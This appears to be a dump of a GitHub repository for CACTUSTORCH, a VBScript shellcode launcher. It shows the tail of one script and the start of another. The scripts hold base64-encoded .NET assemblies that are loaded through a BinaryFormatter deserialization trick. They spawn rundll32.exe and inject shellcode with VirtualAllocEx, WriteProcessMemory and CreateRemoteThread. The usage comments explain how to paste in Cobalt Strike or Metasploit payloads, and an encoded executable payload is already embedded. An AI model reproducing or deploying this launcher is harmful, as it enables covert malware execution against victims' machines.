86 | s = s & "BAIoDwAACgICKBkAAAp9AQAABCoAABMwAgBgAAAAAAAAAAJ+FQAACn0rAAAEAn4VAAAKfSwAAAQC"
87 | s = s & "fhUAAAp9LQAABAJ+FQAACn04AAAEAn4VAAAKfTkAAAQCfhUAAAp9OgAABAJ+FQAACn07AAAEAigP"
88 | s = s & "AAAKAgIoGQAACn0qAAAEKkJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAACgHAAAj"
89 | s = s & "fgAAlAcAAEwJAAAjU3RyaW5ncwAAAADgEAAAXAAAACNVUwA8EQAAEAAAACNHVUlEAAAATBEAANwB"
90 | s = s & "AAAjQmxvYgAAAAAAAAACAAABVx0CFAkCAAAA+gEzABYAAAEAAAAXAAAACQAAAFAAAAAJAAAAHwAA"
91 | s = s & "ABkAAAAzAAAAEgAAAAEAAAABAAAABQAAAAEAAAABAAAABwAAAAAAmQYBAAAAAAAGAFwFkgcGAMkF"
92 | s = s & "kgcGAIoEYAcPALIHAAAGALIE4QYGADAF4QYGABEF4QYGALAF4QYGAHwF4QYGAJUF4QYGAMkE4QYG"
93 | s = s & "AJ4EcwcGAHwEcwcGAPQE4QYGAKsIqQYGAGEEqQYGAE0FqQYGALAGqQYGAMoIqQYGAFkHqQYGAL4I"
94 | s = s & "qQYGAGYGqQYGAIQGcwcAAAAAJQAAAAAAAQABAAEAEABtBgAAPQABAAEACgAQAPgHAAA9AAEACAAK"
95 | s = s & "ARAAzgYAAEEABAAJAAIBAAAbCAAASQAIAAkAAgEAADYIAABJACcACQAKABAABgcAAD0AKgAJAAIB"
96 | s = s & "AABtBAAASQA8AAoAAgEAAPMGAABJAEUACgAGAH0G+gAGAEQHPwAGACQE/QAGAHQIPwAGAOcDPwAG"
97 | s = s & "AMgD+gAGAL0D+gAGBp4DAAFWgLICAwFWgMACAwFWgGQAAwFWgIgCAwFWgMIAAwFWgFMCAwFWgPEB"
98 | s = s & "AwFWgB0CAwFWgAUCAwFWgKABAwFWgAIDAwFWgF4BAwFWgEgBAwFWgOEBAwFWgE0CAwFWgDECAwFW"
99 | s = s & "gGoDAwFWgIIDAwFWgJkCAwFWgB0DAwFWgHYBAwFWgHUAAwFWgD0AAwFWgCcBAwFWgKgAAwFWgDoD"
100 | s = s & "AwFWgLkBAwFWgBgBAwFWgMYBAwFWgOUCAwEGBp4DAAFWgJEABwFWgHICBwEGAKYD+gAGAO8DPwAG"
101 | s = s & "ABcHPwAGADMEPwAGAEsD+gAGAJoD+gAGAOcF+gAGAO8F+gAGAEcI+gAGAFUI+gAGAOQE+gAGAC4I"
102 | s = s & "+gAGAOcICwEGAA0ACwEGABkAPwAGANIIPwAGANwIPwAGADQHPwAGBp4DAAFWgN4CDgFWgO8ADgFW"
103 | s = s & "gJ0BDgFWgNgCDgFWgNUBDgFWgA8BDgFWgJQBDgFWgAMBDgEGBp4DAAFWgOcAEgFWgFcAEgFWgNUA"
104 | s = s & "EgFWgFgDEgFWgGkCEgFWgE8DEgFWgN0AEgFWgGADEgFWgBEGEgFWgCQGEgFWgDkGEgEAAAAAgACW"
105 | s = s & "IC4AFgEBAAAAAACAAJYg8wgqAQsAAAAAAIAAliAJCTUBEAAAAAAAgACWIGMIPwEVAAAAAACAAJEg"
106 | s = s & "1ANFARcAUCAAAAAAhhg+BwYAHgBYIAAAAACGAE0EUAEeAGshAAAAAIYYPgcGACAAjCEAAAAAhhg+"
107 | s = s & "BwYAIAAAAAEAOwQAAAIAUwQAAAMA5AcAAAQA0QcAAAUAwQcAAAYACwgAAAcAvAgAAAgAHAkBAAkA"
108 | s = s & "BAcCAAoAzAYAAAEAGwQAAAIAiwgAAAMAAwYAAAQAawQAAAUAsggAAAEAdAgAAAIAfQgAAAMAIQcA"
109 | s = s & "AAQAAwYAAAUAtQYAAAEAdAgAAAIA+gMAAAEAdAgAAAIA0QcAAAMA9wUAAAQAlQgAAAUAKAcAAAYA"
110 | s = s & "CwgAAAcAsgMAAAEAAgkAAAIAAQAJAD4HAQARAD4HBgAZAD4HCgApAD4HEAAxAD4HEAA5AD4HEABB"
111 | s = s & "AD4HEABJAD4HEABRAD4HEABZAD4HEABhAD4HFQBpAD4HEABxAD4HEACJAD4HBgB5AD4HBgCZAFMG"
112 | s = s & "KQChAD4HAQCpAAQELwCxAHkGNACxAKQIOAChABIHPwChAGQGQgCxADsJRgCxAC8JRgC5AAoGTAAJ"
113 | s = s & "ACQAWgAJACgAXwAJACwAZAAJADAAaQAJADQAbgAJADgAcwAJADwAeAAJAEAAfQAJAEQAggAJAEgA"
114 | s = s & "hwAJAEwAjAAJAFAAkQAJAFQAlgAJAFgAmwAJAFwAoAAJAGAApQAJAGQAqgAJAGgArwAJAGwAtAAJ"
115 | s = s & "AHAAuQAJAHQAvgAJAHgAwwAJAHwAyAAJAIAAzQAJAIQA0gAJAIgA1wAJAIwA3AAJAJAA4QAJAJQA"
116 | s = s & "5gAJAJgA6wAJAKAAWgAJAKQAXwAJAPQAlgAJAPgAmwAJAPwA8AAJAAABuQAJAAQB4QAJAAgB9QAJ"
117 | s = s & "AAwBvgAJABABwwAJABgBbgAJABwBcwAJACABeAAJACQBfQAJACgBWgAJACwBXwAJADABZAAJADQB"
118 | s = s & "aQAJADgBggAJADwBhwAJAEABjAAuAAsAVgEuABMAXwEuABsAfgEuACMAhwEuACsAhwEuADMAmAEu"
119 | s = s & "ADsAmAEuAEMAhwEuAEsAhwEuAFMAmAEuAFsAngEuAGMApAEuAGsAzgFDAFsAngGjAHMAWgDDAHMA"
120 | s = s & "WgADAXMAWgAjAXMAWgAaAIwGAAEDAC4AAQAAAQUA8wgBAAABBwAJCQEAAAEJAGMIAQAAAQsA1AMB"
121 | s = s & "AASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAAAAMAAgAEAAIABQACAAYA"
122 | s = s & "AgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQyAGxwUmVzZXJ2ZWQyADxN"
123 | s = s & "b2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJPTV9KT0IARVhFQ1VURV9S"
124 | s = s & "RUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9VTkRfRU5EAERVUExJQ0FU"
125 | s = s & "RV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBDUkVBVEVfTkVXX0NPTlNP"
126 | s = s & "TEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RVU1RPUkNIAFdSSVRFX1dB"
127 | s = s & "VENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJWRV9DT0RFX0FVVEhaX0xF"
128 | s = s & "VkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVfV09XX1ZETQBQUk9DRVNT"
129 | s = s & "X01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVfTkVXX1BST0NFU1NfR1JP"
130 | s = s & "VVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VTAENSRUFURV9GT1JDRURP"
131 | s = s & "UwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NMQVNTAEhJR0hfUFJJT1JJ"
132 | s = s & "VFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9XX05PUk1BTF9QUklPUklU"
133 | s = s & "WV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVUQUNIRURfUFJPQ0VTUwBD"
134 | s = s & "UkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJVR19PTkxZX1RISVNfUFJP"
135 | s = s & "Q0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVGQVVMVABDUkVBVEVfVU5J"
136 | s = s & "Q09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVTRU5UAENSRUFURV9OT19X"
137 | s = s & "SU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVSSVRfUEFSRU5UX0FGRklO"
138 | s = s & "SVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNiAG1zY29ybGliAGxwVGhy"
139 | s = s & "ZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVUaHJlYWQAaFRocmVhZABs"
140 | s = s & "cFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxlAGxwSGFuZGxlAGJJbmhl"
141 | s = s & "cml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUAbHBDb21tYW5kTGluZQBW"
142 | s = s & "YWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1"
143 | s = s & "dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJh"
144 | s = s & "ZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmli"
145 | s = s & "dXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0"
146 | s = s & "cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNz"
147 | s = s & "ZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5"
148 | s = s & "Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkd1hTaXplAGR3"
149 | s = s & "WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZmllcmZsYWcATk9DQUNI"
150 | s = s & "RV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBGcm9tQmFzZTY0U3RyaW5n"
151 | s = s & "AFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABrZXJuZWwzMi5kbGwAQ0FD"
152 | s = s & "VFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4AbHBQcm9jZXNz"
153 | s = s & "SW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBscFN0YXJ0dXBJ"
154 | s = s & "bmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3RkRXJyb3IALmN0b3IAbHBT"
155 | s = s & "ZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGlt"
156 | s = s & "ZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dp"
157 | s = s & "bmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGxwUHJvY2Vzc0F0dHJp"
158 | s = s & "YnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBDcmVhdGVQcm9jZXNzRmxh"
159 | s = s & "Z3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMAZHdZQ291bnRDaGFycwBU"
160 | s = s & "ZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRB"
161 | s = s & "ZGRyZXNzAENvbmNhdABPYmplY3QAZmxQcm90ZWN0AGxwRW52aXJvbm1lbnQAQ29udmVydABoU3Rk"
162 | s = s & "SW5wdXQAaFN0ZE91dHB1dAB3U2hvd1dpbmRvdwBWaXJ0dWFsQWxsb2NFeABiaW5hcnkAV3JpdGVQ"
163 | s = s & "cm9jZXNzTWVtb3J5AGxwQ3VycmVudERpcmVjdG9yeQBvcF9FcXVhbGl0eQBvcF9JbmVxdWFsaXR5"
164 | s = s & "AAAAAAABABlQAHIAbwBnAHIAYQBtAFcANgA0ADMAMgAADXcAaQBuAGQAaQByAAAVXABTAHkAcwBX"
165 | s = s & "AE8AVwA2ADQAXAAAFVwAUwB5AHMAdABlAG0AMwAyAFwAAAMwAAAARY+bzuLqxE+aSSAzLsphXgAE"
166 | s = s & "IAEBCAMgAAEFIAEBEREEIAEBDgQgAQECDgcJHQUYEhwREA4YGAgYBQABHQUOBAABDg4DIAAIBgAD"
167 | s = s & "Dg4ODgIGGAMgAA4FAAICDg4EAAEIHAi3elxWGTTgiQQBAAAABAIAAAAEBAAAAAQIAAAABBAAAAAE"
168 | s = s & "IAAAAARAAAAABIAAAAAEAAEAAAQAAgAABAAEAAAEAAgAAAQAEAAABAAgAAAEAEAAAAQAgAAABAAA"
169 | s = s & "AQAEAAACAAQAAAQABAAACAAEAAAQAAQAACAABAAAAAEEAAAAAgQAAAAEBAAAAAgEAAAAEAQAAAAg"
170 | s = s & "BAAAAEAEAAAAgAQAMAAABAAAQAACBggCBgICBgkDBhEUAwYRGAIGBgMGESADBhEkEwAKGA4OEgwS"
171 | s = s & "DAIRFBgOEhwQERAKAAUYGBgYESARJAkABQIYGB0FGAgFAAICGAkKAAcYGBgJGBgJGAUgAgEODggB"
172 | s = s & "AAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAQAQALQ0FDVFVT"
173 | s = s & "VE9SQ0gAAAUBAAAAAAUBAAEAACkBACQ1NjU5OGYxYy02ZDg4LTQ5OTQtYTM5Mi1hZjMzN2FiZTU3"
174 | s = s & "NzcAAAwBAAcxLjAuMC4wAAAASDUAAAAAAAAAAAAAYjUAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
175 | s = s & "AFQ1AAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAA"
176 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
177 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
178 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA"
179 | s = s & "ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A"
180 | s = s & "VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA"
181 | s = s & "AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA"
182 | s = s & "BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs"
183 | s = s & "AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA"
184 | s = s & "cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA"
185 | s = s & "AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA"
186 | s = s & "UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu"
187 | s = s & "ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA"
188 | s = s & "SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV"
189 | s = s & "AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA"
190 | s = s & "AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP"
191 | s = s & "AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA"
192 | s = s & "VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw"
193 | s = s & "AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA"
194 | s = s & "LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
195 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
196 | s = s & "AAAAAAAAAAAAAAAAADAAAAwAAAB0NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
197 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
198 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
199 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
200 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
201 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
202 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
203 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
204 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
205 | s = s & "AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv"
206 | s = s & "bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"
207 | entry_class = "cactusTorch"
208 |
209 | Dim fmt, al, d, o
210 | Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
211 | Set al = CreateObject("System.Collections.ArrayList")
212 | al.Add fmt.SurrogateSelector
213 |
214 | Set d = fmt.Deserialize_2(Base64ToStream(s))
215 | Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
216 | o.flame binary,code
217 | End Sub
218 |
219 | SetVersion
220 | On Error Resume Next
221 | Run
222 | If Err.Number <> 0 Then
223 | Debug Err.Description
224 | Err.Clear
225 | End If
226 |
--------------------------------------------------------------------------------
/CACTUSTORCH.vbs:
--------------------------------------------------------------------------------
1 | ' ( ) ( )
2 | ' ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /(
3 | ' )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\())
4 | ' (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\
5 | ' )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_)
6 | '((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || |
7 | ' | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ |
8 | ' \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_|
9 | '
10 | ' Author: Vincent Yiu (@vysecurity)
11 | ' Credits:
12 | ' - @cn33liz: Inspiration with StarFighter
13 | ' - @tiraniddo: James Forshaw for DotNet2JScript
14 | ' - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into
15 |
16 | ' A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.
17 |
18 | ' Usage:
19 | ' Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example...
20 | ' Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework
21 | ' Run: cat payload.bin | base64 -w 0
22 | ' Copy the base64 encoded payload into the code variable below.
23 |
24 | ' Replace with binary name that you want to inject into. This can be anything that exists both in SYSWOW64 and SYSTEM32
25 | Dim binary : binary = "rundll32.exe"
26 |
27 | ' Base64 encoded 32 bit shellcode
28 | Dim code : code = "TVroAAAAAFtSRVWJ5YHDcoAAAP/TicNXaAQAAABQ/9Bo8LWiVmgFAAAAUP/TAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqzckXF4fZF8rNyRcXh50XIs3JFxeHxRVqzckX8dQlF1LNyRduzc0UGs3JFxeH7RWKzckXF4eBF2rNyRcXh40Xas3JFUmljaNuzckUAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQBOViNZAAAAAAAAAADgAAKhCwEJAABCAgAA4gAAAAAAAFFvAQAAEAAAAGACAAAAABAAEAAAAAIAAAUAAAAAAAAABQAAAAA"
29 |
30 | ' ---------- DO NOT EDIT BELOW HERE -----------
31 |
32 | Sub Debug(s)
33 | End Sub
34 | Sub SetVersion
35 | End Sub
36 | Function Base64ToStream(b)
37 | Dim enc, length, ba, transform, ms
38 | Set enc = CreateObject("System.Text.ASCIIEncoding")
39 | length = enc.GetByteCount_2(b)
40 | Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform")
41 | Set ms = CreateObject("System.IO.MemoryStream")
42 | ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)
43 | ms.Position = 0
44 | Set Base64ToStream = ms
45 | End Function
46 |
47 | Sub Run
48 | Dim s, entry_class
49 | s = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"
50 | s = s & "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"
51 | s = s & "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"
52 | s = s & "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"
53 | s = s & "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"
54 | s = s & "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"
55 | s = s & "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"
56 | s = s & "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"
57 | s = s & "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"
58 | s = s & "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"
59 | s = s & "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"
60 | s = s & "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"
61 | s = s & "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"
62 | s = s & "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"
63 | s = s & "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"
64 | s = s & "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"
65 | s = s & "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"
66 | s = s & "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"
67 | s = s & "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"
68 | s = s & "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"
69 | s = s & "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"
70 | s = s & "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"
71 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"
72 | s = s & "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAkNhXWQAAAAAA"
73 | s = s & "AAAA4AAiIAsBMAAAFgAAAAYAAAAAAAByNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"
74 | s = s & "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAIDUA"
75 | s = s & "AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
76 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"
77 | s = s & "AAAALnRleHQAAAB4FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA"
78 | s = s & "AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA"
79 | s = s & "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAFQ1AAAAAAAASAAAAAIABQD4IQAAKBMAAAEAAAAAAAAA"
80 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT"
81 | s = s & "MAoABwEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMJAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA"
82 | s = s & "Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME"
83 | s = s & "EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAosbhEFFnMRAAAK"
84 | s = s & "ByAAMAAAH0AoAgAABhMGEgYoFgAACnJXAABwKBgAAAosChEFFigEAAAGJioWEwcSCAaOaSgRAAAK"
